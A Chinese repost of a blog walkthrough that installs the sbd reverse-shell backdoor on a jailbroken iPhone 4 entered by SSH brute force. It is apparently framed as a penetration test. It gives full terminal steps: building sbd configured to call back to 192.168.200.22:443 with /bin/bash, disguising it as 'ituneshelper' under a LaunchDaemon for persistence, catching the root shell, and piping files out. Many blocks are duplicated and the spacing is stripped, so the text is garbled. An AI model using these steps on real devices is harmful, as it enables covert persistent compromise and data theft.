在IPhone/IPad上建立反弹后门
转载地址:http://www.freebuf.com/others/2158.html
小编:sbd是一款小型后门,且具有较强大的加密功能,是居家旅行杀人越货谋财害命之必备佳品(安全测试工具请勿非法使用),下载地址: http://packetstormsecurity.org/files/download/34401/sbd-1.36.tar.gz
在一次安全渗透测试中,我通过ssh暴力**拿到了一台iphone4(已越狱)的权限。于是我成功的SSH连接上这台设备,安装了一个持久的TCP反弹后门(sbd-1.36 by Michel Blomgren)
接下来来详细说明所有的步骤:
1. 安装iphone-gcc:
iphone4:~root#uname-an
Darwiniphone411.0.0DarwinKernelVersion11.0.0:TueNov120:33:58PDT2011;root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930XiPhone3,1armN90APDarwin
iphone4:~root#apt-getupdate
Get:1http://repo.biteyourapple.net./Release.gpg[490B]
Hithttp://cydia.zodttd.comstableRelease.gpg
Hithttp://apt.saurik.comios/675.00Release.gpg
Hithttp://repo.insanelyi.com./Release.gpg
...
iphone4:~root#apt-getinstalliphone-gcc
Readingpackagelists...Done
Buildingdependencytree
Readingstateinformation...Done
...
Settingupldid(610-5)...
Settingupcom.sull.iphone-gccheaders(1.0-11)...
Settingupcom.sull.fake-libgcc(1.0-2)...
Settingupiphone-gcc(4.2-20080604-1-8)...
iphone4:~/sbd-1.36root#apt-getinstallmake
Readingpackagelists...Done
Buildingdependencytree
Readingstateinformation...Done
...
Unpackingmake(from.../make_3.81-2_iphoneos-arm.deb)...
Settingupmake(3.81-2)...
Darwiniphone411.0.0DarwinKernelVersion11.0.0:TueNov120:33:58PDT2011;root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930XiPhone3,1armN90APDarwin
iphone4:~root#apt-getupdate
Get:1http://repo.biteyourapple.net./Release.gpg[490B]
Hithttp://cydia.zodttd.comstableRelease.gpg
Hithttp://apt.saurik.comios/675.00Release.gpg
Hithttp://repo.insanelyi.com./Release.gpg
...
iphone4:~root#apt-getinstalliphone-gcc
Readingpackagelists...Done
Buildingdependencytree
Readingstateinformation...Done
...
Settingupldid(610-5)...
Settingupcom.sull.iphone-gccheaders(1.0-11)...
Settingupcom.sull.fake-libgcc(1.0-2)...
Settingupiphone-gcc(4.2-20080604-1-8)...
iphone4:~/sbd-1.36root#apt-getinstallmake
Readingpackagelists...Done
Buildingdependencytree
Readingstateinformation...Done
...
Unpackingmake(from.../make_3.81-2_iphoneos-arm.deb)...
Settingupmake(3.81-2)...
2. 下载sbd后门:
iphone4:~root#wgethttp://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
--2012-04-2323:50:43--http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
Resolvingpacketstorm.tacticalflex.com...173.160.180.156
Connectingtopacketstorm.tacticalflex.com|173.160.180.156|:80...connected.
HTTPrequestsent,awaitingresponse...200OK
Length:84093(82K)[application/x-gzip]
Savingto:`sbd-1.36.tar.gz'
100%[======================================>]84,09366.3K/sin1.2s
2012-04-2323:50:45(66.3KB/s)-`sbd-1.36.tar.gz'saved[84093/84093]
iphone4:~root#tar-zxvfsbd-1.36.tar.gz
sbd-1.36/
sbd-1.36/sbd.c
sbd-1.36/doexec.c
sbd-1.36/pel.c
sbd-1.36/aes.c
sbd-1.36/sha1.c
sbd-1.36/socket_code.h
sbd-1.36/pel.h
sbd-1.36/aes.h
sbd-1.36/sha1.h
sbd-1.36/sbd.h
sbd-1.36/doexec_unix.h
sbd-1.36/doexec_win32.h
sbd-1.36/readwrite.h
sbd-1.36/misc.h
sbd-1.36/Makefile
sbd-1.36/mktarball.sh
sbd-1.36/README
sbd-1.36/COPYING
sbd-1.36/CHANGES
sbd-1.36/binaries/
sbd-1.36/binaries/sbd.exe
sbd-1.36/binaries/sbdbg.exe
iphone4:~root#cdsbd-1.36
iphone4:~/sbd-1.36root#ls-al
total224
drwx------31000100748Sep172004./
drwxr-x---6rootwheel272Apr2323:50../
-rw-------110001001876Sep172004CHANGES
-rw-------1100010018007Jun82004COPYING
-rw-------110001002176Jun202004Makefile
-rw-------110001004880Sep112004README
-rw-------1100010031370Jun122004aes.c
-rw-------11000100549Jun112004aes.h
drwx------21000100136Sep112004binaries/
-rw-------1100010077Jun22004doexec.c
-rw-------110001007114Sep112004doexec_unix.h
-rw-------1100010019060Sep82004doexec_win32.h
-rw-------1100010014968Sep92004misc.h
-rwx------11000100624Jun132004mktarball.sh*
-rw-------1100010013381Sep82004pel.c
-rw-------11000100898Sep92004pel.h
-rw-------110001009829Sep92004readwrite.h
-rw-------1100010020557Sep92004sbd.c
-rw-------110001002014Jun82004sbd.h
-rw-------110001008900Jun22004sha1.c
-rw-------11000100436Jun22004sha1.h
-rw-------1100010020800Sep92004socket_code.h
--2012-04-2323:50:43--http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
Resolvingpacketstorm.tacticalflex.com...173.160.180.156
Connectingtopacketstorm.tacticalflex.com|173.160.180.156|:80...connected.
HTTPrequestsent,awaitingresponse...200OK
Length:84093(82K)[application/x-gzip]
Savingto:`sbd-1.36.tar.gz'
100%[======================================>]84,09366.3K/sin1.2s
2012-04-2323:50:45(66.3KB/s)-`sbd-1.36.tar.gz'saved[84093/84093]
iphone4:~root#tar-zxvfsbd-1.36.tar.gz
sbd-1.36/
sbd-1.36/sbd.c
sbd-1.36/doexec.c
sbd-1.36/pel.c
sbd-1.36/aes.c
sbd-1.36/sha1.c
sbd-1.36/socket_code.h
sbd-1.36/pel.h
sbd-1.36/aes.h
sbd-1.36/sha1.h
sbd-1.36/sbd.h
sbd-1.36/doexec_unix.h
sbd-1.36/doexec_win32.h
sbd-1.36/readwrite.h
sbd-1.36/misc.h
sbd-1.36/Makefile
sbd-1.36/mktarball.sh
sbd-1.36/README
sbd-1.36/COPYING
sbd-1.36/CHANGES
sbd-1.36/binaries/
sbd-1.36/binaries/sbd.exe
sbd-1.36/binaries/sbdbg.exe
iphone4:~root#cdsbd-1.36
iphone4:~/sbd-1.36root#ls-al
total224
drwx------31000100748Sep172004./
drwxr-x---6rootwheel272Apr2323:50../
-rw-------110001001876Sep172004CHANGES
-rw-------1100010018007Jun82004COPYING
-rw-------110001002176Jun202004Makefile
-rw-------110001004880Sep112004README
-rw-------1100010031370Jun122004aes.c
-rw-------11000100549Jun112004aes.h
drwx------21000100136Sep112004binaries/
-rw-------1100010077Jun22004doexec.c
-rw-------110001007114Sep112004doexec_unix.h
-rw-------1100010019060Sep82004doexec_win32.h
-rw-------1100010014968Sep92004misc.h
-rwx------11000100624Jun132004mktarball.sh*
-rw-------1100010013381Sep82004pel.c
-rw-------11000100898Sep92004pel.h
-rw-------110001009829Sep92004readwrite.h
-rw-------1100010020557Sep92004sbd.c
-rw-------110001002014Jun82004sbd.h
-rw-------110001008900Jun22004sha1.c
-rw-------11000100436Jun22004sha1.h
-rw-------1100010020800Sep92004socket_code.h
3. 在编译前配置Sbd(我把Sbd配置成了一个守护进程,所有的参数包括反弹IP、端口、密码、加密设置等等):
iphone4:~/sbd-1.36root#catsbd.h
#defineSOURCE_PORT0
#defineCONVERT_TO_CRLF0
#defineENCRYPTION1
#defineSHARED_SECRET"password"
#defineQUIET0
#defineVERBOSE0
#defineDAEMONIZE0
#defineHIGHLIGHT_INCOMING0
#defineHIGHLIGHT_PREFIX"\x1b[0;32m"
#defineHIGHLIGHT_SUFFIX"\x1b[0m"
#defineSEPARATOR_BETWEEN_PREFIX_AND_DATA":"
#defineRUN_ONLY_ONE_INSTANCE0
#defineINSTANCE_SEMAPHORE"shadowinteger_bd_semaphore"
/*connectto192.168.200.22onport443(https)andserve/bin/bash.
*reconnectevery10seconds.
*/
#defineDOLISTEN0
#defineHOST"192.168.200.22"
#definePORT443
#defineRESPAWN_ENABLED1
#defineRESPAWN_INTERVAL10
#defineEXECPROG"/bin/bash"
#defineSOURCE_PORT0
#defineCONVERT_TO_CRLF0
#defineENCRYPTION1
#defineSHARED_SECRET"password"
#defineQUIET0
#defineVERBOSE0
#defineDAEMONIZE0
#defineHIGHLIGHT_INCOMING0
#defineHIGHLIGHT_PREFIX"\x1b[0;32m"
#defineHIGHLIGHT_SUFFIX"\x1b[0m"
#defineSEPARATOR_BETWEEN_PREFIX_AND_DATA":"
#defineRUN_ONLY_ONE_INSTANCE0
#defineINSTANCE_SEMAPHORE"shadowinteger_bd_semaphore"
/*connectto192.168.200.22onport443(https)andserve/bin/bash.
*reconnectevery10seconds.
*/
#defineDOLISTEN0
#defineHOST"192.168.200.22"
#definePORT443
#defineRESPAWN_ENABLED1
#defineRESPAWN_INTERVAL10
#defineEXECPROG"/bin/bash"
然后你可以选择性的使用以下参数:
host: ./sbd -l -p 443 -k 1234
server: ./sbd -r 10 -q -e /bin/sh -c on -k 1234 -D on 192.168.200.22 443
4. 编译过程:
iphone4:~/sbd-1.36root#make
usage:
makeunix-Linux,NetBSD,FreeBSD,OpenBSD
makesunos-SunOS(Solaris)
makewin32-nativewin32consoleapp(w/Cygwin+MinGW)
makewin32bg-createanativewin32no-consoleapp(w/Cygwin+MinGW)
makewin32bgCFLAGS=-DSTEALTH-stealthyno-consoleapp
makemingw-nativewin32consoleapp(w/MinGWMSYS)
makemingwbg-nativewin32no-consoleapp(w/MinGWMSYS)
makecygwin-Cygwinconsoleapp
makedarwin-Darwin
iphone4:~/sbd-1.36root#makedarwin
rm-fsbdsbd.exe*.ocore
gcc-Wall-Wshadow-O2-osbdpel.caes.csha1.cdoexec.csbd.c
stripsbd
iphone4:~/sbd-1.36root#ls-alsbd
-rwxr-xr-x1root10055296Apr2402:10sbd*
usage:
makeunix-Linux,NetBSD,FreeBSD,OpenBSD
makesunos-SunOS(Solaris)
makewin32-nativewin32consoleapp(w/Cygwin+MinGW)
makewin32bg-createanativewin32no-consoleapp(w/Cygwin+MinGW)
makewin32bgCFLAGS=-DSTEALTH-stealthyno-consoleapp
makemingw-nativewin32consoleapp(w/MinGWMSYS)
makemingwbg-nativewin32no-consoleapp(w/MinGWMSYS)
makecygwin-Cygwinconsoleapp
makedarwin-Darwin
iphone4:~/sbd-1.36root#makedarwin
rm-fsbdsbd.exe*.ocore
gcc-Wall-Wshadow-O2-osbdpel.caes.csha1.cdoexec.csbd.c
stripsbd
iphone4:~/sbd-1.36root#ls-alsbd
-rwxr-xr-x1root10055296Apr2402:10sbd*
5. 配置守护进程 (为了持久)
iphone4:~/sbd-1.36root#cpsbd/usr/bin/ituneshelper
iphone4:~/sbd-1.36root#cd/Library/LaunchDaemons/
iphone4:/Library/LaunchDaemonsroot#ls-al
total16
drwxr-xr-x2rootwheel136Apr2402:02./
drwxrwxr-x18rootadmin816Dec3115:38../
-rw-r--r--1rootwheel847Feb152011com.openssh.sshd.plist
iphone4:/Library/LaunchDaemonsroot#cat<<EOF>>com.ituneshelper.start.plist
<?xmlversion="1.0"encoding="UTF-8"?>
Label
com.ituneshelper.start
ProgramArguments
/usr/bin/ituneshelper
RunAtLoad
StartInterval
1
EOF
iphone4:/Library/LaunchDaemonsroot#ls-al
total16
drwxr-xr-x2rootwheel136Apr2402:15./
drwxrwxr-x18rootadmin816Dec3115:38../
-rw-r--r--1rootwheel404Apr2402:01com.ituneshelper.start.plist
-rw-r--r--1rootwheel847Feb152011com.openssh.sshd.plist
iphone4:~/sbd-1.36root#cd/Library/LaunchDaemons/
iphone4:/Library/LaunchDaemonsroot#ls-al
total16
drwxr-xr-x2rootwheel136Apr2402:02./
drwxrwxr-x18rootadmin816Dec3115:38../
-rw-r--r--1rootwheel847Feb152011com.openssh.sshd.plist
iphone4:/Library/LaunchDaemonsroot#cat<<EOF>>com.ituneshelper.start.plist
<?xmlversion="1.0"encoding="UTF-8"?>
Label
com.ituneshelper.start
ProgramArguments
/usr/bin/ituneshelper
RunAtLoad
StartInterval
1
EOF
iphone4:/Library/LaunchDaemonsroot#ls-al
total16
drwxr-xr-x2rootwheel136Apr2402:15./
drwxrwxr-x18rootadmin816Dec3115:38../
-rw-r--r--1rootwheel404Apr2402:01com.ituneshelper.start.plist
-rw-r--r--1rootwheel847Feb152011com.openssh.sshd.plist
6. 连接(from Linux box):
[email protected]:~#uname-an
Linuxcoresec3.0.0-17-generic#30-UbuntuSMPThuMar820:45:39UTC2012x86_64x86_64x86_64GNU/Linux
[email protected]:~#ifconfig
eth0Linkencap:EthernetHWaddr00:0c:29:03:72:5e
inetaddr:192.168.200.22Bcast:192.168.200.255Mask:255.255.255.0
inet6addr:fe80::20c:29ff:fe03:725e/64Scope:Link
UPBROADCASTRUNNINGMULTICASTMTU:1500Metric:1
RXpackets:14741errors:0dropped:0overruns:0frame:0
TXpackets:10042errors:0dropped:0overruns:0carrier:0
collisions:0txqueuelen:1000
RXbytes:20159805(20.1MB)TXbytes:720669(720.6KB)
[email protected]:/home/enzo/sbd-1.36#./sbd-l-p443-kpassword
id
uid=0(root)gid=0(wheel)groups=0(wheel)
/bin/bash-i
bash:nojobcontrolinthisshell
bash-4.0#ps-ef
UIDPIDPPIDCSTIMETTYTIMECMD
01000:00.00??0:00.95/sbin/launchd
019100:00.00??0:00.95/usr/libexec/UserEventAgent-lSystem
021100:00.00??0:00.68/usr/sbin/notifyd
023100:00.00??0:00.41/usr/sbin/syslogd
025100:00.00??0:01.64/usr/libexec/configd
2527100:00.00??0:01.53/System/Library/Frameworks/CoreTelephony.framework/Support/CommCenterClassic
50129100:00.00??0:12.27/System/Library/CoreServices/SpringBoard.app/SpringBoard
50133100:00.00??0:00.60/System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled
037100:00.00??0:00.81/usr/libexec/lockdownd
043100:00.00??0:00.56/System/Library/CoreServices/powerd.bundle/powerd
049100:00.00??0:19.04/usr/libexec/locationd
055100:00.00??0:00.21/usr/bin/sbsettingsd
056100:00.00??0:00.69/usr/sbin/wifid
50158100:00.00??0:00.46/System/Library/PrivateFrameworks/Ubiquity.framework/Versions/A/Support/ubd
50171100:00.00??0:01.99/usr/sbin/mediaserverd
50172100:00.00??0:00.13/System/Library/PrivateFrameworks/MediaRemote.framework/Support/mediaremoted
6573100:00.00??0:00.27/usr/sbin/mDNSResponder-launchd
50175100:00.00??0:00.87/System/Library/PrivateFrameworks/IMCore.framework/imagent.app/imagent
50176100:00.00??0:00.45/System/Library/PrivateFrameworks/IAP.framework/Support/iapd
078100:00.00??0:00.13/usr/libexec/fseventsd
50179100:00.00??0:00.92/usr/sbin/fairplayd.N90
50180100:00.00??0:01.76/System/Library/PrivateFrameworks/DataAccess.framework/Support/dataaccessd
50186100:00.00??0:00.45/System/Library/PrivateFrameworks/ApplePushService.framework/apsd
50187100:00.00??0:00.34/System/Library/PrivateFrameworks/AggregateDictionary.framework/Support/aggregated
50192100:00.00??0:00.39/usr/sbin/BTServer
50193100:00.00??0:00.99/usr/sbin/aosnotifyd
094100:00.00??0:00.02/usr/bin/ituneshelper
0157100:00.00??0:00.11/usr/libexec/networkd
501260100:00.00??0:01.94/Applications/MobileMail.app/MobileMail
501261100:00.00??0:00.75/Applications/MobilePhone.app/MobilePhone
02869400:00.00??0:00.03bash
030028600:00.00??0:00.03/bin/bash-i
030330000:00.00??0:00.01ps-ef
bash-4.0#uname-an
Darwiniphone411.0.0DarwinKernelVersion11.0.0:TueNov120:33:58PDT2011;root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930XiPhone3,1armN90APDarwin
Linuxcoresec3.0.0-17-generic#30-UbuntuSMPThuMar820:45:39UTC2012x86_64x86_64x86_64GNU/Linux
[email protected]:~#ifconfig
eth0Linkencap:EthernetHWaddr00:0c:29:03:72:5e
inetaddr:192.168.200.22Bcast:192.168.200.255Mask:255.255.255.0
inet6addr:fe80::20c:29ff:fe03:725e/64Scope:Link
UPBROADCASTRUNNINGMULTICASTMTU:1500Metric:1
RXpackets:14741errors:0dropped:0overruns:0frame:0
TXpackets:10042errors:0dropped:0overruns:0carrier:0
collisions:0txqueuelen:1000
RXbytes:20159805(20.1MB)TXbytes:720669(720.6KB)
[email protected]:/home/enzo/sbd-1.36#./sbd-l-p443-kpassword
id
uid=0(root)gid=0(wheel)groups=0(wheel)
/bin/bash-i
bash:nojobcontrolinthisshell
bash-4.0#ps-ef
UIDPIDPPIDCSTIMETTYTIMECMD
01000:00.00??0:00.95/sbin/launchd
019100:00.00??0:00.95/usr/libexec/UserEventAgent-lSystem
021100:00.00??0:00.68/usr/sbin/notifyd
023100:00.00??0:00.41/usr/sbin/syslogd
025100:00.00??0:01.64/usr/libexec/configd
2527100:00.00??0:01.53/System/Library/Frameworks/CoreTelephony.framework/Support/CommCenterClassic
50129100:00.00??0:12.27/System/Library/CoreServices/SpringBoard.app/SpringBoard
50133100:00.00??0:00.60/System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled
037100:00.00??0:00.81/usr/libexec/lockdownd
043100:00.00??0:00.56/System/Library/CoreServices/powerd.bundle/powerd
049100:00.00??0:19.04/usr/libexec/locationd
055100:00.00??0:00.21/usr/bin/sbsettingsd
056100:00.00??0:00.69/usr/sbin/wifid
50158100:00.00??0:00.46/System/Library/PrivateFrameworks/Ubiquity.framework/Versions/A/Support/ubd
50171100:00.00??0:01.99/usr/sbin/mediaserverd
50172100:00.00??0:00.13/System/Library/PrivateFrameworks/MediaRemote.framework/Support/mediaremoted
6573100:00.00??0:00.27/usr/sbin/mDNSResponder-launchd
50175100:00.00??0:00.87/System/Library/PrivateFrameworks/IMCore.framework/imagent.app/imagent
50176100:00.00??0:00.45/System/Library/PrivateFrameworks/IAP.framework/Support/iapd
078100:00.00??0:00.13/usr/libexec/fseventsd
50179100:00.00??0:00.92/usr/sbin/fairplayd.N90
50180100:00.00??0:01.76/System/Library/PrivateFrameworks/DataAccess.framework/Support/dataaccessd
50186100:00.00??0:00.45/System/Library/PrivateFrameworks/ApplePushService.framework/apsd
50187100:00.00??0:00.34/System/Library/PrivateFrameworks/AggregateDictionary.framework/Support/aggregated
50192100:00.00??0:00.39/usr/sbin/BTServer
50193100:00.00??0:00.99/usr/sbin/aosnotifyd
094100:00.00??0:00.02/usr/bin/ituneshelper
0157100:00.00??0:00.11/usr/libexec/networkd
501260100:00.00??0:01.94/Applications/MobileMail.app/MobileMail
501261100:00.00??0:00.75/Applications/MobilePhone.app/MobilePhone
02869400:00.00??0:00.03bash
030028600:00.00??0:00.03/bin/bash-i
030330000:00.00??0:00.01ps-ef
bash-4.0#uname-an
Darwiniphone411.0.0DarwinKernelVersion11.0.0:TueNov120:33:58PDT2011;root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930XiPhone3,1armN90APDarwin
7. 如果你想与被控制的iphone间传送文件,你可以用以下参数使用sbd:
[email protected]:/home/enzo/sbd-1.36#sbd-l-p12345-ksecret>output.file
iphone4:~/sbd-1.36root#cat/.../.../input.file|./sbd-ksecret192.168.200.2212345
iphone4:~/sbd-1.36root#cat/.../.../input.file|./sbd-ksecret192.168.200.2212345
8. 删除后门也很简单:
iphone4:/Library/LaunchDaemonsroot#rm-rfcom.ituneshelper.start.plist
iphone4:/Library/LaunchDaemonsroot#rm-rf/usr/bin/ituneshelper
iphone4:/Library/LaunchDaemonsroot#rm-rf/usr/bin/ituneshelper